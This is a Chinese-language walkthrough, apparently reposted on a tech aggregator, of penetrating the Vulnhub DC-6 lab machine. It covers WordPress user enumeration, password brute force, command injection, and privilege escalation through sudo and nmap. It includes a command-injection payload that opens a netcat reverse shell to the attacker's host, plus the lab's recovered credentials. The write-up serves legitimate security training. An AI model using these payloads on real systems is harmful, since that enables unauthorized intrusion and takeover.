IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> dc-6 靶机渗透学习 -> 正文阅读

[网络协议]dc-6 靶机渗透学习

信息收集

扫描当前网段,确定存活主机

nmap -sP 192.168.202.0/24

对靶机进行端口扫描,发现80、22端口开放

nmap -A -p- -v 192.168.202.145

访问80端口,发现和dc-2一样的问题,会自动跳转到域名,需要手动在hosts文件加入ip对应关系。

?

修改后重新访问80端口,用Wappalyzer扫描一下框架,发现是WordPress

?

根据靶机作者的提示,大致就知道是通过爆破来做

在这里插入图片描述

?

用专门的CMS扫描器枚举用户名

wpscan --url http://wordy -e u

将扫出来的用户名放进admin.txt

?

将提示中的字典进行解压

cd /usr/share/wordlists/
ls
gunzip rockyou.txt.gz rockyou.txt

?按照提示要求提取一部分作为爆破的字典

cat /usr/share/wordlists/rockyou.txt |grep k01 >pass.txt

用wpscan进行爆破

wpscan --url http://wordy -U admin.txt -P pass.txt

得到账号密码

?Username: mark, Password: helpdesk01

得到账号密码还得知道登录界面,使用dirsearch进行扫描

python3 dirsearch.py -u  http://wordy

发现一个/wp-admin,进入页面完成登录,之后寻找一下漏洞点。

漏洞利用

?在Activity monitor界面发现有IP转换和查找功能,这是不是和皮卡丘靶场的命令执行有点相似,分别对两个测试一波。

?通过测试,可以判断Lookup处存在命令执行漏洞

?

反弹shell

利用测试出来的漏洞反弹shell。

在kali机

nc -lvnp 8888

?在命令执行漏洞处,记得F12改一下最大长度

;nc -e /bin/bash 192.168.202.129 8888

?交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

提权

尝试SUID提权,并没有发现可利用点

find / -perm -4000 -print 2>/dev/null

?

尝试免密使用的root级别命令,需要密码,也不行

sudo -l

提一下一位师傅的思路,在已知账号和密码的情况下,可以先尝试直接使用已知账号的密码提权(但在该靶机上都被拒绝了)

接下来根据以往的经验,查找一下/home目录下的文件。

发现jens存在backups.sh,用ls -l查看一下,发现并没有写的权限。

??mark目录存在graham的密码???

?Add new user: graham - GSo7isUM1D4 - done

切换graham用户进行登录

su graham

?尝试SUID提权,也没有利用点

尝试免密使用root级别命令,发现可以以jens的身份免密使用备份文件backups.sh

接着进入/home/jens查看一下也没有写的权限

ls -l

?

那么大致思路就有了,将/bin/bash写入backups.sh中,以jens用户身份运行该文件即可获得目标shell。

写入backups.sh

echo "/bin/bash" >>backups.sh

?以jens用户身份运行得到目标shell

sudo -u jens ./backups.sh

还是先试试SUID提权,没成功

看看可以免密使用的root级别命令

噢,好像有戏。写入一个执行bash的nmap脚本,以root权限免密运行

echo 'os.execute("/bin/bash")'> getshell

?os-execute相当于system

Lua os.execute() - 简书 (jianshu.com)

以root权限免密运行,提权成功

sudo nmap --script=getshell

?

Nmap参数详解 - 简书 (jianshu.com)

?

参考文章

?vulnhub-DC6靶机 - xinZa1

【渗透项目】靶机DC-6渗透过程_super小明的博客-CSDN博客_靶机dc6

VulnHub靶机渗透之DC:6 - 云+社区 - 腾讯云 (tencent.com)

DC-6 渗透测试_Darklord.W的博客-CSDN博客_dc-6

Lua os.execute() - 简书 (jianshu.com)

Linux通过第三方应用提权实战总结 - FreeBuf网络安全行业门户

Nmap参数详解 - 简书 (jianshu.com)

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2022-03-24 00:56:55  更:2022-03-24 00:57:57 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/26 5:42:56-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码